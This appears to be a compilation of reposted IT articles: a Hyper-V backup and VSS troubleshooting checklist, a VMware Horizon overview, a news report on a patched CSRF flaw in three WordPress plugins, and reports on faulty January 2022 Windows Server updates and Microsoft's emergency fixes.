If the VM giving trouble is running Microsoft SBS 2011, then please go through this article.
In the Properties dialog of the VM, from either Hyper-V Manager or SCVMM, look on the Integration Services tab and ensure that “Backup (volume checkpoint)” is checked.
The guest VM is in a running state.
All the guest VM’s disks have ample free space available for the internal shadow copy to complete. You must have 10% free disk space on each disk.
In the guest VM, the service with name “Hyper-V Volume Shadow Copy Requestor” is running.
The Checkpoint File Location for the VM must be set to be the same volume in the host operating system as the VHDX files for the VM.
The guest VM must have a SCSI controller attached in the VM settings (in Hyper-V Manager). There is no need to have any disks on the controller, but it must be present.
The guest VM must not have any Shadow Storage assignment of a volume explicitly set to a different volume other than itself. This can be checked by running “vssadmin list shadowstorage” through command line.
If the guest OS has a system reserved partition, verify that it has at least 45MB of free space. If less than that is free, ensure that a windows shadow copy can be created as per the screenshot below:
All of the virtual machine’s volumes must be formatted with NTFS/ReFS. The volume that contains the .VHD(s) for the VM must also be formatted with NTFS/ReFS. The guest operating system’s disks must be “Basic”, not “Dynamic” (this is not the same as dynamic vs. fixed VHDs, see screenshot below):
Run the command below in command prompt inside the VM that is crash-consistent:

vssadmin list writers

In the results check that all writers inside the VM are in a “Stable” state and showing “No error”.
Check that the shadowstorage on each drive is not full, ideally set to unbounded. You can set it as unbounded by running the following command in command prompt:

vssadmin add shadowstorage /For=C: /On=C: /MaxSize=UNBOUNDED
vssadmin resize shadowstorage /For=C: /On=C: /MaxSize=UNBOUNDED

Note: Run the two above commands for each drive, each time replacing the drive letter from C: to the drive in question.
The “COM+ Event System”, “Distributed Transaction Coordinator”, “Remote Procedure Call (RPC)”, and “System Event Notification” services must be running within the VM. By default, these are set to “Automatic” and/or “Automatic (Delayed Start)”. The “COM+ System Application” and “Microsoft Software Shadow Copy Provider” and “Volume Shadow Copy” services must at least be set to Manual, which is the default for these. It is acceptable, but not required, to set them to “Automatic” or “Automatic (Delayed Start)”.
Check if you are getting a “vmicvss” with event ID 13 inside the Application event log of the VM that is specifying that Windows cannot perform an online backup of this system. Event below:

Event ID: 13
Source: vmicvss
Description: Windows cannot perform an online backup of this system because scoped snapshots are enabled. To resolve this, disable scoped snapshots by creating the following registry value on this computer:
PATH: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore\
DWORD: ScopeSnapshots
Value: 0
If the issue persists check for warnings or errors in the Application and System event logs on the VM that is giving trouble.
Ensure that the latest Windows Updates for the Host and VM are also applied. Please note that “Optional Updates” are usually also important for VSS operations and are suggested as well.
If none of the above helps, please contact our support team.

Source :
https://help.altaro.com/support/solutions/articles/43000469403

What Is VMware Horizon and How Does It Work?

Businesses today have been forced to switch to remote working to ensure continued business continuity. After the pandemic began in early 2020, it caused a shift to a majority remote workforce, seemingly overnight. With the change to a distributed workforce, new requirements have emerged for businesses around availability, security, and flexibility.

Virtual Desktop Infrastructure (VDI) is a solution that allows connecting remote workers with virtual desktops and applications running in a corporate data center. VMware Horizon is a VDI solution offered by VMware that provides a robust feature set and capabilities for remote workers. So what is VMware Horizon, and how does it work?

What is VMware Horizon?

Today, the work from anywhere model is no longer optional for businesses. Providing accessibility, flexibility, and connectivity from anywhere for the distributed workforce allows remote employees to remain productive no matter where they are located.

As the pandemic escalated, businesses quickly found legacy on-premises desktop and app virtualization platforms that predated the widespread use of the cloud were not equipped for current challenges. It led to many companies struggling to provide the distributed workforce with fast and reliable access to apps they need for business productivity.

VMware Horizon is an end-to-end solution for managing and delivering virtualized or physical desktops and virtual application delivery to end-users. It allows creating and brokering connections to Windows & Linux virtual desktops, Remote Desktop Services (RDS) applications, and desktops. It can also deliver Linux-hosted applications.

VMware Horizon is a Virtual Desktop Infrastructure (VDI) solution, a core component of VMware’s digital workspace for businesses looking to deliver virtual desktops and applications to their workforce. It provides the tooling and capabilities that enable access from any device and is deeply integrated with other VMware solutions and services such as VMware NSX, VMware Workspace One, vSAN, and others.

VMware Horizon provides secure and robust connectivity for remote workers

Recent VMware Horizon versions have evolved to provide desktop resources on-premises, in the cloud, hybrid clouds, and multi-cloud environments.

VMware Horizon Editions

VMware Horizon is provided in three editions:

Horizon Standard

Horizon Advanced

Horizon Enterprise

All three editions provide the components needed for end-to-end virtual desktop deployment.

What are the key capabilities / features of VMware Horizon?

VMware Horizon is a flexible and agile hybrid cloud platform.

It enables businesses to utilize existing datacenter based resources, including transforming on-premises desktop and app environments without redeploying.

It provides the ability to leverage the cloud for additional capacity and use cases

Choose if and when you transition workloads to optimize performance and lower the cost of on-premises environments.

It lets you leverage cloud-native control plane services. As a result, it reduces costs, improves productivity, and shifts IT focus from manual tasks to automated processes.

Manage and monitor your deployment from one central management GUI.

It offers the ability to meet remote user needs keeping employees connected to desktops and apps from anywhere and any device with a single login. It doesn’t matter where the data resides, on-premises or in the cloud.

The Horizon control plane delivers the ability to deploy, manage, and scale, virtual desktops, and apps across hybrid cloud environments.

Horizon is a modern platform for securely delivering virtual desktops and apps across the hybrid cloud, keeping employees connected, productive and engaged, anytime and anywhere.

Deliver applications and desktops automatically and in real-time

One of the key benefits and use cases of VMware Horizon is to deliver applications and desktops automatically and in real-time. Today, many organizations are using VMware Horizon as the vehicle that allows remote workers to connect to virtual machine resources or physical workstations in the corporate network, without VPN, or exposing an RDP server to the outside world.

Administrators configure desktop pools consisting of a single desktop or multiple desktops that end-users can connect to and utilize. When there are multiple virtual machines or physical desktops in a single pool, users will be placed on an available desktop resource in the pool.

Desktop pools consist of:

Automated desktop pools – An automated desktop pool uses a vCenter Server template or virtual machine snapshot to generate new machines. The machines can be created when the pool is created or generated on demand based on pool usage.

Manual desktop pools – A manual desktop pool provides access to an existing set of machines. Any machine that can install the VMware Horizon agent is supported. These include both vCenter virtual machines and physical desktops.

RDS Desktop pools – A Microsoft RDS desktop pool provides RDS sessions as machines to Horizon users. The Horizon Connection Server manages the RDS sessions in the same way as normal machines. Microsoft RDS hosts are supported on vCenter virtual machines and physical computers.

Viewing VMware Horizon Desktop Pools

Application Pools provide remote workers with access to published applications, either from a desktop pool or RDS farm.

Viewing a published application in VMware Horizon

It also allows quickly performing maintenance tasks such as enabling or disabling specific Horizon Connection Servers and performing backup operations. You can also add vCenter Server environments and integrate your Unified Access Gateways to the environment.

Performing maintenance operations in the VMware Horizon Administration Console

Simplify management and maintenance tasks

One of the key areas that VMware Horizon provides quick time to value is the area of management and maintenance. The VMware Horizon Administration Console is an HTML 5 web console that is quick and intuitive. All of the tasks are very wizard-driven with natural workflows.

In the VMware Horizon Administration Console, administrators can easily see:

Problem vCenter VMs

Problem RDS hosts

Events

System Health

The VMware Horizon Monitoring dashboard quickly shows the overall system health, sessions, workload, VDI desktops, RDSH desktops, RDSH applications, and other information.

Viewing the VMware Horizon monitoring dashboard

Keep sensitive data safe and enforce endpoint compliance

Several tools and VMware Horizon configurations help keep business-critical and sensitive data safe and enforce endpoint compliance. For example, the Endpoint Compliance Checks feature is part of the Unified Access Gateway (UAG) that provides a layer of security for clients accessing Horizon resources. The Endpoint Compliance Checks helps to verify end-user client compliance to predefined policies. These may include antivirus policy or encryption policy on endpoints.

Currently, a couple of endpoint compliance check providers offer the ability to check compliance of endpoints. These include:

OPSWAT – The OPSWAT MetaAccess persistent agent or the OPSWAT MetaAccess on-demand agent on the Horizon Client communicates the compliance status to an OPSWAT instance. It can then enforce policies related to the health of the endpoint and the allowed access to Horizon resources

OPSWAT Endpoint Compliance Checks

Workspace ONE Intelligence (Risk Analytics) – The Workspace ONE Intelligence platform has a risk analytics feature. It can assess both user and device risk by identifying behaviours that affect security and calculating a risk score for each device and user. Based on the risk score, policies can define whether or not clients can connect and access resources.

End-user components

There are only a couple of different components required for end-user clients for VMware Horizon. Actually, you can use either a browser to connect to the Horizon environment or the VMware Horizon Client. Most modern clients feature an HTML5-capable browser that allows connecting to VMware Horizon.

While you can connect to VMware Horizon-enabled endpoints using a web browser, the most robust connection experience is provided with the VMware Horizon Client. However, a question often comes up with the VMware Horizon Client – is it free?

The VMware Horizon Client is indeed a free download from the VMware Customer Connect portal. Also, there is no need to provide an email address and sign up for an account. You can find the most recent download of the VMware Horizon Clients here:

Download VMware Horizon Clients – VMware Customer Connect

Downloading the VMware Horizon Client

The availability and ease of downloading the VMware Horizon Client help to ensure remote workers can easily download, install, and connect to VMware Horizon resources. Another great feature built into the VMware Horizon Client is checking for and updating the client directly from the interface.

Checking for updates to VMware Horizon Client

When remote workers browse to the public URL of the Unified Access Gateway, the UAG presents the Horizon Connection Server web page, allowing users to download the client or connect to their assigned resources using the VMware Horizon HTML access link.

Browsing to the VMware Horizon web access

VMware Workspace ONE UEM additional components

Organizations using cloud-based VMware Workspace ONE can simplify access to the cloud, mobile, and enterprise applications from various types of devices. Workspace ONE Unified Endpoint Management (UEM) is a single solution for modern, over-the-air management of desktops, mobile, rugged, wearables, and IoT.

It manages and secures devices and apps, taking advantage of native MDM capabilities in IOS and Android and the mobile-cloud management efficiencies found in modern versions of Windows, Mac, and Chrome OS.

Supported devices with Workspace ONE UEM

Managing clients with Workspace ONE UEM requires the Workspace ONE UEM agent is installed on the devices for management. It can be installed manually, scripted installations, or by using GPOs. Organizations can also make use of the Workspace ONE Intelligent Hub for an easily integrated digital workspace solution designed to improve employee engagement and productivity through a single app.

Read more about VMware Workspace ONE Intelligent Hub here:

Workspace ONE Intelligent Hub | VMware

The New Naming Format for VMware Horizon 8

VMware has departed a bit from the conventional naming convention associated with legacy versions of VMware Horizon previously. While the older versions of VMware Horizon were named according to a “major.minor” release name, VMware has adopted a release cadence style “YYMM” naming convention, denoting the year and month of the release, much like other software vendors have adopted in the last couple of years.

VMware Horizon 8 is denoted with a new naming convention in the YYMM format

If you see any of the VMware Horizon versions that start with at least a “20,” these are synonymous with VMware Horizon 8 across various documentation.

Is VMware Horizon a VPN?

There are many ways that enterprise organizations have traditionally delivered access to internal resources for remote employees. Virtual Private Network (VPN) has historically been a prevalent and familiar way for end-users to access business-critical resources that reside on the internal corporate network from the Internet.

While VPN is more secure than simply placing internal resources accessible directly from the Internet (not recommended), it also has its share of security issues. With VPN connections, a VPN client is loaded on the client workstation, laptop, or other devices, creating a secure, encrypted tunnel between the client and a VPN terminator, such as a firewall or other VPN device.

VPNs traditionally have been used for remote connectivity

While this secures and encrypts the communication between the client and the internal network, it essentially makes the end-user device part of the network. You can think of a VPN connection as simply a “long patch cable” between the corporate network switch and the client. There are ways to secure VPN connections and scope down the resources the external clients can see. However, it opens the door to potentially connecting a client with malware to the corporate network. It also creates the possibility of easy data exfiltration from the corporate network to the client.

VPN connections are also notoriously complex and cumbersome to manage and maintain. Admins must manage each VPN client individually in most cases. In addition, each VPN connection is its own tunnel to the corporate network, creating the need for tedious management of multiple tunnels.

VMware Horizon provides a solution that is not VPN-based and solves the challenges mentioned above with traditional VPN connections. Note the following:

Remote users connect to virtual or physical desktops that are provisioned inside the corporate network. It means the end-user remote client is not directly connected to the corporate network

While the Horizon Client is recommended for the most robust experience connecting to the VMware Horizon environment, end-users can also connect to provisioned resources over a simple web browser connection, with no client required.

VPNs may not work with all types of devices. VMware Horizon connectivity, either via the Horizon Client or web browser connection, means almost any modern device with web connectivity can allow a user to connect to VMware Horizon resources

Admins have a consolidated and centrally managed set of infrastructure as a connectivity point, either with the Unified Access Gateways (recommended for secure external connectivity) or the Horizon Connection Servers

Combined with VMware NSX-T Data Center, administrators can easily secure the connectivity between VMware Horizon resources and which resources users can hit, making it an identity-driven solution

VMware Anywhere Workspace

VMware Horizon is a core component of the VMware Anywhere Workspace. What is the VMware Anywhere Workspace? It is a holistic solution that combines multiple components required for effective and efficient secure remote access, including:

Digital workspace solution – Provided by VMware Horizon cloud services or on-premises resources

Endpoint security – Organizations can seamlessly secure their remote worker interface with VMware NSX-T Data Center and VMware Carbon Black.

Secure Access Service Edge (SASE) – Secure access service edge platform that converges industry-leading cloud networking and cloud security to deliver flexibility, agility, security, and scale for enterprise environments of all sizes.

Note how VMware Horizon fits into the various aspects of VMware Anywhere Workspace:

It helps to manage multi-modal employee experience – With the VMware Anywhere Workspace, VMware Horizon can help deliver a familiar desktop and application experience across workspace locations and devices.

Security and the distributed edge – VMware Horizon delivers access to desktops and applications to any endpoint.

Anywhere Workspace Integrations – Workspace SEcurity brings Carbon Black together with Workspace ONE UEM and VMware Horizon

VMware Horizon Architecture and Logical Components

VMware Horizon has a robust architecture that is compromised of many different components that make up the end-to-end solution. The components of VMware Horizon architecture include:

Horizon Client – The client is the piece that forms the protocol session connection to a Horizon Agent running in a virtual desktop, RDSH server, or physical machine

Universal Access Gateway (UAG) – It provides secure edge services for the Horizon Client. The Horizon Client authenticates to a Connection Server through the Unified Access Gateway and then forms a protocol session connection to the UAG and then the Horizon Agent running in a virtual desktop or RDSH server.

Horizon Connection Server – The Connection Server brokers and connects users to the Horizon Agent installed on VMs, physical hosts, and RDSH servers. The Connection Server authenticates user sessions through Active Directory, and grants access to the proper entitled resource.

Horizon Agent – The agent is installed in the guest OS of the target VM or system. It allows the machine to be managed by the Connection Servers and allows a Horizon Client to connect using the protocol session to the Horizon Agent.

RDSH Server – Microsoft Remote Desktop Servers that provide access to published applications and session-based remote desktops to end-users.

Virtual Machine – Virtual machines can be configured as persistent or non-persistent desktops. Persistent desktops are usually assigned in a 1-to-1 fashion to a specific user. Non-persistent desktops are assigned in desktop pools that can be dynamically provisioned to users as needed.

Physical Desktop – Counterintuitively, VMware Horizon can be used as a secure and efficient way to deliver connectivity to physical desktops to end-users. Starting with VMware Horizon 7.7, VMware introduced the ability to broker physical desktop machines with RDP. In Horizon 7.12, support was added for Blast protocol connectivity to physical desktops.

Virtual Application – Horizon can be used with RDSH servers to provide virtual application delivery. Using the functionality of the published application in RDSH, VMware Horizon can deliver the published applications to assigned users.

Logical Components

There are other components of Horizon architecture that are considered to be logical components of the solution. Some of the components listed below are not absolutely required. However, they can be used to enhance a Horizon deployment and scale the capabilities, security, and performance of the solution.

Workspace ONE Access – VMware Workspace ONE provides the solution for enterprise single sign-on (SSO) for the enterprise. It simplifies the access to apps, desktops, and other resources to the end-user. It can integrate with existing identity providers and provide a seamless login experience to create a smooth access workflow. It also offers application provisioning, a self-service catalogue, and conditional access.

App Volumes Manager – VMware App Volumes Manager coordinates and orchestrates the delivery of applications by managing assignments of application volumes. These include packages and writable volumes that can easily assign applications to users, groups, and target computers.

Dynamic Environment Manager – User profiles are also challenging in dynamic environments with multiple resources accessed by a single user. Dynamic Environment Manager enables seamless profile management by capturing user settings for the operating system and also end-user applications.

VMware vSAN™ storage – VMware vSAN is a software-defined storage solution that offers many advantages in the enterprise. It can deliver high-performance, highly-scalable storage that can be seamlessly managed from the vSphere Client as part of the native VMware solution. It does this by aggregating locally attached storage in each ESXi host in the vSphere cluster and presenting it as a logical volume for virtual machines and modern workloads. When it comes to VMware Horizon environments that are mission-critical, you want to have highly-resilient storage that is scalable and performant. VMware Horizon environments backed by VMware vSAN work exceptionally well for this use case.

VMware NSX-T Data Center – Another consideration for VMware Horizon environments and end-user computing is security. VMware NSX-T Data Center provides the network-based security needed in EUC environments. It allows easily creating secure, resilient, and software-defined networks that allow admins to take advantage of micro-segmentation for VMware Horizon workloads. Each virtual desktop can be isolated from all other virtual desktops using VMware NSX-T Data Center, bolstering security and protecting other critical Horizon infrastructure, such as the Connection Servers.

Microsoft SQL Servers – It is recommended to have a dedicated Microsoft SQL Server to house the event databases required by VMware Horizon. Plan your VMware Horizon deployment accordingly.

Horizon Hybrid and Multicloud Architecture

VMware Horizon can be deployed in many different architecture designs. These include on-premises, in the cloud, or a combination of hybrid and multi-cloud architectures.

In the VMware Horizon hybrid deployment, infrastructure can run in an on-premises datacenter with the Horizon control plane running in the cloud as well as deploy on both on-premises and public cloud, and join the two. In addition, organizations can connect their existing Horizon 7 or Horizon 8 implementations to the Horizon Cloud Service using the Horizon Cloud Connector appliance.

The VMware Horizon Control Plane Services are designed to meet modern challenges for remote workers and connectivity. Organizations that use virtual desktops and apps from companies that only support cloud solutions can benefit from the Horizon Control Plane Services. Existing VDI implementations may only be able to work with cloud environments. The Horizon Control Plane allows managing all hybrid and multi-cloud deployments and configurations.

VMware Horizon hybrid architecture with the Horizon Control Plane

It provides many benefits outside of management, including:

Universal brokering

Image management

Application management

Monitoring

Lifecycle management

The Horizon Control Plane Services

Just-in-time desktops and apps

VMware Horizon technology allows organizations to provision “just-in-time” desktops and applications. Using a technology VMware calls Instant Clone Technology, entire desktops can be provisioned just-in-time. The Instant Clone Technology allows the rapid cloning of virtual machines in just a few seconds! Instant clones can configure, on average, one clone per second.

The Instant Clone Technology is really a radical evolution of what VMware Composer clones could do previously. With Instant Clone Technology, the steps required to provision a clone with VMware Composer are dramatically reduced. Note the comparison of the two processes below:

Comparing VMware Horizon Composer with Instant Clone Technology

The VMware Instant Clone Technology was born from a project called “vmFork” that uses rapid in-memory cloning of a running parent virtual machine and copy-on-write to deploy the virtual machines to production rapidly.

Copy-on-write – The copy-on-write technology is an optimization strategy that forces tasks first to create a separate private copy of the data to prevent its changes from becoming visible to all other tasks. With copy-on-write, the parent VM is quiesced and then forked. The forking process creates two branches or variations of development, and the resulting clones receive unique MAC addresses, UUIDs, and other unique information.

Using the Instant Clone Technology with VDI provisioning is perfect for the just-in-time desktop and applications use case. New workstations can quickly be provisioned, just in time for the user to log into the environment. Then, using VMware App Volumes to attach AppStacks to the just-in-time desktops dynamically, you can have fully functional workstations with dynamically assigned applications in a matter of seconds, fully customized for each user.

Should you be using VMware Horizon?

VMware Horizon is a powerful remote connectivity solution that allows businesses today to solve the challenges of remote workers and connectivity needs. In addition, it enables businesses to scale their deployments with modern architectures, including hybrid cloud deployments and multi-cloud architectures.

With the new VMware Horizon Control Plane services, organizations can manage multiple VMware Horizon deployments across sites, clouds, and different infrastructures from the cloud. In addition, it opens up the possibility for organizations to use heterogeneous implementations of virtual desktops that may exist across on-premises and public cloud environments and aggregate these services for end-users.

VMware provides a rich set of additional solutions and services that seamlessly integrate with VMware Horizon and extend the solution’s capabilities, scalability, security, and management. These include VMware vSAN, VMware NSX-T Data Center, VMware Workspace ONE, Workspace ONE UEM, and VMware Anywhere Workspace.

For end-user clients, connecting to Workspace ONE or native VMware Horizon resources is as simple as browsing the solution’s service URLs. While the VMware Horizon Client provides the most robust connectivity experience for end-user clients, users can also use the HTML client to connect to virtual machines, physical desktops, and applications using a simple web browser.

The Instant Clone Technology provided by VMware Horizon allows just-in-time desktops and applications to be provisioned in seconds, a feat that is amazing to see and provides businesses with the capability to have exponentially more scale in providing virtual desktops to end-users. In addition, the dynamic capabilities offered by VMware Horizon allow companies to elastically scale up and scale down virtual desktops, even with on-premises infrastructure.

Source :
https://www.altaro.com/vmware/vmware-horizon/

High-Severity Vulnerability in 3 WordPress Plugins Affected 84,000 Websites

Researchers have disclosed a security shortcoming affecting three different WordPress plugins that impact over 84,000 websites and could be abused by a malicious actor to take over vulnerable sites.

“This flaw made it possible for an attacker to update arbitrary site options on a vulnerable site, provided they could trick a site’s administrator into performing an action, such as clicking on a link,” WordPress security company Wordfence said in a report published last week.

Tracked as CVE-2022-0215, the cross-site request forgery (CSRF) flaw is rated 8.8 on the CVSS scale and impacts three plugins maintained by Xootix —

Login/Signup Popup (Inline Form + Woocommerce),
Side Cart Woocommerce (Ajax), and
Waitlist Woocommerce (Back in stock notifier)

Cross-site request forgery, also known as one-click attack or session riding, occurs when an authenticated end-user is tricked by an attacker into submitting a specially crafted web request. “If the victim is an administrative account, CSRF can compromise the entire web application,” OWASP notes in its documentation.

Specifically, the vulnerability has its origin in a lack of validation when processing AJAX requests, effectively enabling an attacker to update the “users_can_register” (i.e., anyone can register) option on a site to true and set the “default_role” setting (i.e., the default role of users who register at the blog) to administrator, granting complete control.

Login/Signup Popup is installed on over 20,000 sites, while Side Cart Woocommerce and Waitlist Woocommerce have been installed on more than 4,000 and 60,000 sites, respectively.

Following responsible disclosure by Wordfence researchers in November 2021, the issue has been addressed in Login/Signup Popup version 2.3, Side Cart Woocommerce version 2.1, and Waitlist Woocommerce version 2.5.2.

The findings come a little over a month after attackers exploited weaknesses in four plugins and 15 Epsilon Framework themes to target 1.6 million WordPress sites as part of a large-scale attack campaign originating from 16,000 IP addresses.

“Though this Cross-Site Request Forgery (CSRF) vulnerability is less likely to be exploited due to the fact that it requires administrator interaction, it can have a significant impact to a successfully exploited site and, as such, it serves as an incredibly important reminder to remain aware when clicking on links or attachments and to ensure that you are regularly keeping your plugins and themes up to date,” Wordfence’s Chloe Chamberland said.

Source :
https://thehackernews.com/2022/01/high-severity-vulnerability-in-3.html

Microsoft releases emergency fixes for Windows Server, VPN bugs

Microsoft has released emergency out-of-band (OOB) updates to address multiple issues caused by Windows Updates issued during the January 2022 Patch Tuesday.

“Microsoft is releasing Out-of-band (OOB) updates today, January 18, 2022, for some versions of Windows,” the company said.

“This update addresses issues related to VPN connectivity, Windows Server Domain Controllers restarting, Virtual Machines start failures, and ReFS-formatted removable media failing to mount.”

All OOB updates released today are available for download on the Microsoft Update Catalog, and some of them can also be installed directly through Windows Update as optional updates.

You will have to manually check for updates if you want to install the emergency fixes through Windows Update because they are optional updates and will not install automatically.

The following updates can only be downloaded and installed via the Microsoft Update Catalog:

Windows 8.1, Windows Server 2012 R2: KB5010794
Windows Server 2012: KB5010797

Updates for these Windows versions are also available through Windows Update as an optional update:

Windows 11, version 21H1 (original release): KB5010795
Windows Server 2022: KB5010796
Windows 10, version 21H2: KB5010793
Windows 10, version 21H1: KB5010793
Windows 10, version 20H2, Windows Server, version 20H2: KB5010793
Windows 10, version 20H1, Windows Server, version 20H1: KB5010793
Windows 10, version 1909, Windows Server, version 1909: KB5010792
Windows Server 2019: KB5010791 (Released on 1/18/22)
Windows 10, version 1607, Windows Server 2016: KB5010790
Windows 10, version 1507: KB5010789
Windows 7 SP1: KB5010798
Windows Server 2008 SP2: KB5010799

January Windows updates issues and fixes

As BleepingComputer reported after this month’s Patch Tuesday, the latest Windows Server updates were causing a series of severe issues for administrators.

According to admin reports, Windows domain controllers were being plagued by spontaneous reboots, Hyper-V was no longer starting on Windows servers, and Windows Resilient File System (ReFS) volumes were no longer accessible after deploying the January 2022 updates.

Windows 10 users and administrators also reported problems with L2TP VPN connections after installing the recent Windows 10 and Windows 11 cumulative updates and seeing “Can’t connect to VPN.” errors.

Those who cannot immediately install today’s out-of-band updates can remove the KB5009624, KB5009557, KB5009555, KB5009566, and KB5009543 updates causing these issues from an Elevated Command Prompt with the following commands:

Windows Server 2012 R2: wusa /uninstall /kb:5009624 
Windows Server 2019: wusa /uninstall /kb:5009557 
Windows Server 2022: wusa /uninstall /kb:5009555
Windows 10: wusa /uninstall /kb:5009543
Windows 11: wusa /uninstall /kb:5009566

However, since Microsoft also bundles all the security updates with these Windows cumulative updates, removing them will also remove all fixes for vulnerabilities patched during the January 2022 Patch Tuesday.

Windows admins and users need to consider the risks of unpatched vulnerabilities impacting their systems versus the disruption caused by the issues stemming from this month’s Windows updates.

Source :
https://www.bleepingcomputer.com/news/microsoft/microsoft-releases-emergency-fixes-for-windows-server-vpn-bugs/

New Windows Server updates cause DC boot loops, break Hyper-V

Update 1/17/21: Microsoft has released OOB updates to fix the Windows Server bugs.

The latest Windows Server updates are causing severe issues for administrators, with domain controllers having spontaneous reboots, Hyper-V not starting, and inaccessible ReFS volumes until the updates are rolled back

Yesterday, Microsoft released the Windows Server 2012 R2 KB5009624 update, the Windows Server 2019 KB5009557 update, and the Windows Server 2022 KB5009555 update as part of the January 2022 Patch Tuesday.

After installing these updates, administrators have been battling multiple issues that are only resolved after removing the updates.

Windows domain controller boot loops

The most serious issue introduced by these updates is that Windows domain controllers enter a boot loop, with servers getting into an endless cycle of Windows starting and then rebooting after a few minutes.

As first reported by BornCity, this issue affects all supported Windows Server versions.

“Looks KB5009557 (2019) and KB5009555 (2022) are causing something to fail on domain controllers, which then keep rebooting every few minutes,” a user posted to Reddit.

A Windows Server administrator told BleepingComputer that they see the LSASS.exe process use all of the CPU on a server and then ultimately terminate.

As LSASS is a critical process required for Windows to operate correctly, the operating system will automatically restart when the process is terminated.

The following error will be logged to the event viewer when restarting due to a crashed LSASS process, as another user on Reddit shared.

“The process wininit.exe has initiated the restart of computer [computer_name] on behalf of user for the following reason: No title for this reason could be found Reason Code: 0x50006 Shutdown Type: restart Comment: The system process ‘C:\WINDOWS\system32\lsass.exe’ terminated unexpectedly with status code -1073741819. The system will now shut down and restart.”

Hyper-V no longer starts

In addition to the boot loops, BleepingComputer has been told by Windows administrators that after installing the patches, Hyper-V no longer starts on the server.

This bug primarily affects Windows Server 2012 R2 server, but other unverified reports say it affects newer versions of Windows Server.

As Hyper-V is not started, when attempting to launch a virtual machine, users will receive an error stating the following:

“Virtual machine xxx could not be started because the hypervisor is not running.”

Microsoft released security updates to fix four different Hyper-V vulnerabilities yesterday (CVE-2022-21901, CVE-2022-21900, CVE-2022-21905, and CVE-2022-21847), which are likely causing this issue.

ReFS file systems are no longer accessible

Finally, numerous admins are reporting that Windows Resilient File System (ReFS) volumes are no longer accessible or are seen as RAW (unformatted) after installing the updates.

The Resilient File System (ReFS) is a Microsoft proprietary file system that has been designed for high availability, data recovery, and high performance for very large storage volumes.

“Installed these updates tonight, in a two server Exchange 2016 CU22 DAG, running on Server 2012 R2. After a really long reboot, the server came back up with all the ReFS volumes as RAW,” explained a Microsoft Exchange administrator on Reddit.

“NTFS volumes attached were fine. I realize this is not exclusively an exchange question but it is impacting my ability to bring services for Exchange back online.”

Uninstalling the Windows Server updates made the ReFS volumes accessible again.

Yesterday, Microsoft fixed seven remote code execution vulnerabilities in ReFS, with one or more likely behind the inaccessible ReFS volumes.

These vulnerabilities are tracked as CVE-2022-21961, CVE-2022-21959, CVE-2022-21958, CVE-2022-21960, CVE-2022-21963, CVE-2022-21892, CVE-2022-21962, CVE-2022-21928.

How to fix?

Unfortunately, the only way to fix these issues is to uninstall the corresponding cumulative update for your Windows version.

Admins can do this by using one of the following commands:

Windows Server 2012 R2: wusa /uninstall /kb:KB5009624 
Windows Server 2019: wusa /uninstall /kb:KB5009557 
Windows Server 2022: wusa /uninstall /kb:KB5009555

As Microsoft bundles all security fixes into the single update, removing the cumulative update may fix the bugs, but will also remove all fixes for recently patched vulnerabilities.

Therefore, uninstalling these updates should only be done if absolutely necessary.

Not to be outdone by Windows Server, Windows 10 and Windows 11’s updates are also breaking L2TP VPN connections.

On January 17th, Microsoft released out-of-band updates to fix the following issues:

Windows L2TP VPN connection issues
Domain controller reboots
Hyper-V not starting
ReFS volumes becoming inaccessible

More information about these updates can be found in our dedicated “Microsoft releases emergency fixes for Windows Server, VPN bugs” article.

Update 1/17/21: Added information about the OOB updates released to fix these issues.

Source :
https://www.bleepingcomputer.com/news/microsoft/new-windows-server-updates-cause-dc-boot-loops-break-hyper-v/